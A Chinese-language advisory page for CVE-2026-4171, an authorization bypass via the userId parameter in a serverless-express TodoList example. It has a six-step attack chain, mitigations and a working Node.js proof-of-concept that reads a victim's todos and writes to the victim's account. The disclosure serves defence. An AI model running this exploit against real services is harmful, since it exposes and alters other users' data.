CVE-2026-4171 CodeGenieApp serverless-express 授权绕过漏洞

漏洞信息

漏洞编号

CVE-2026-4171

漏洞类型

授权绕过

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeGenieApp serverless-express

漏洞概述

CVE-2026-4171是一个存在于CodeGenieApp serverless-express框架中的授权绕过漏洞。该漏洞影响serverless-express 4.17.1及之前版本，问题的核心在于API Endpoint组件中的文件examples/lambda-function-url/packages/api/models/TodoList.ts对userId参数的处理存在安全缺陷。攻击者可以通过操纵userId参数绕过正常的授权检查机制，在低权限情况下访问未授权的资源或功能。该漏洞的CVSS评分为6.3，属于中等严重程度，攻击向量为网络形式，无需用户交互即可发起攻击。漏洞已于2026年3月16日公开披露，厂商虽被提前告知但未做出任何回应。由于该漏洞的利用代码已公开披露且可远程利用，建议受影响用户尽快采取防护措施。

技术细节

该授权绕过漏洞存在于CodeGenieApp serverless-express框架的API Endpoint组件中，具体位置在examples/lambda-function-url/packages/api/models/TodoList.ts文件。漏洞的根本原因在于程序对userId参数的处理逻辑存在缺陷，未能正确验证请求发起者的身份与目标userId是否匹配。攻击者可以通过在API请求中操纵userId参数值来访问其他用户的资源或执行未授权操作。由于攻击向量为网络形式（AV:N），且只需要低权限（PR:L），任何能够访问API端点的攻击者都可以尝试利用此漏洞。漏洞属于横向权限提升类型，攻击者可以利用自己的低权限账号，通过修改userId参数来访问或操作其他用户的数据。CVSS向量中的机密性、完整性和可用性影响均为低（C:L/I:L/A:L），表明该漏洞主要风险在于未授权数据访问。

攻击链分析

STEP 1

信息收集

攻击者首先识别目标系统使用的CodeGenieApp serverless-express框架版本，确认版本是否在受影响范围内（≤4.17.1）

STEP 2

认证获取

攻击者注册低权限账户或利用已有低权限账号获取有效的访问令牌（Bearer Token）

STEP 3

漏洞探测

攻击者构造带有userId参数的API请求，观察服务器响应，验证是否存在授权绕过漏洞

STEP 4

参数操纵

攻击者将请求中的userId参数值修改为目标用户（受害者）的ID，利用授权检查缺陷绕过权限验证

STEP 5

数据窃取

成功绕过授权后，攻击者可以读取受害用户的TodoList数据，包括敏感信息

STEP 6

横向移动

攻击者进一步尝试修改或删除受害用户的数据，甚至利用获取的信息进行更深层次的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-4171 PoC - Authorization Bypass via userId Parameter Manipulation
// Target: CodeGenieApp serverless-express API Endpoint

const axios = require('axios');

// Configuration
const TARGET_URL = 'https://target-server.com/api/todolist';
const ATTACKER_TOKEN = 'attacker_low_privilege_token';
const VICTIM_USER_ID = 'victim_user_id_123';

async function exploitAuthorizationBypass() {
  console.log('[+] CVE-2026-4171 Authorization Bypass Exploit');
  console.log('[+] Target:', TARGET_URL);
  
  // Step 1: Normal request with attacker's own userId
  console.log('\n[*] Step 1: Testing with attacker userId...');
  try {
    const normalResponse = await axios.get(`${TARGET_URL}`, {
      headers: {
        'Authorization': `Bearer ${ATTACKER_TOKEN}`,
        'Content-Type': 'application/json'
      },
      params: {
        userId: 'attacker_own_user_id'
      }
    });
    console.log('[+] Normal request successful:', normalResponse.status);
  } catch (error) {
    console.log('[-] Normal request failed:', error.message);
  }
  
  // Step 2: Exploit - Bypass authorization by manipulating userId
  console.log('\n[*] Step 2: Exploiting authorization bypass with victim userId...');
  try {
    const exploitResponse = await axios.get(`${TARGET_URL}`, {
      headers: {
        'Authorization': `Bearer ${ATTACKER_TOKEN}`,
        'Content-Type': 'application/json'
      },
      params: {
        userId: VICTIM_USER_ID  // Manipulating userId to access victim's data
      }
    });
    console.log('[+] Exploit successful - Accessed victim data!');
    console.log('[+] Response status:', exploitResponse.status);
    console.log('[+] Response data:', JSON.stringify(exploitResponse.data, null, 2));
    return true;
  } catch (error) {
    console.log('[-] Exploit failed:', error.message);
    return false;
  }
}

// POST request exploitation
async function exploitWriteOperations() {
  console.log('\n[*] Step 3: Testing write operations on victim account...');
  try {
    const writeResponse = await axios.post(`${TARGET_URL}`, {
      userId: VICTIM_USER_ID,
      data: {
        title: 'Malicious Todo Item',
        description: 'Added via authorization bypass'
      }
    }, {
      headers: {
        'Authorization': `Bearer ${ATTACKER_TOKEN}`,
        'Content-Type': 'application/json'
      }
    });
    console.log('[+] Write operation successful!');
    console.log('[+] Response:', JSON.stringify(writeResponse.data, null, 2));
  } catch (error) {
    console.log('[-] Write operation failed:', error.message);
  }
}

// Execute exploit
(async () => {
  const success = await exploitAuthorizationBypass();
  if (success) {
    await exploitWriteOperations();
  }
  console.log('\n[!] Exploit completed');
})();

影响范围

CodeGenieApp serverless-express <= 4.17.1

防御指南

临时缓解措施

由于厂商未回应此漏洞披露，建议采取以下临时缓解措施：1）在应用层实施额外的授权检查，确保当前认证用户的身份与请求的userId参数一致；2）使用Web应用防火墙（WAF）规则限制异常的userId参数请求；3）实施速率限制防止自动化攻击；4）监控API访问日志，及时发现和阻止可疑的横向权限提升行为；5）考虑使用API网关进行统一的认证和授权管理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4171
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4171
3 Details https://www.cvedetails.com/cve/CVE-2026-4171/
4 VulDB https://vuldb.com/cve/CVE-2026-4171
5 Link https://github.com/AnalogyC0de/public_exp/issues/20
6 Link https://vuldb.com/?ctiid.351078
7 Link https://vuldb.com/?id.351078
8 Link https://vuldb.com/?submit.769769
9 Link https://vuldb.com/?submit.769771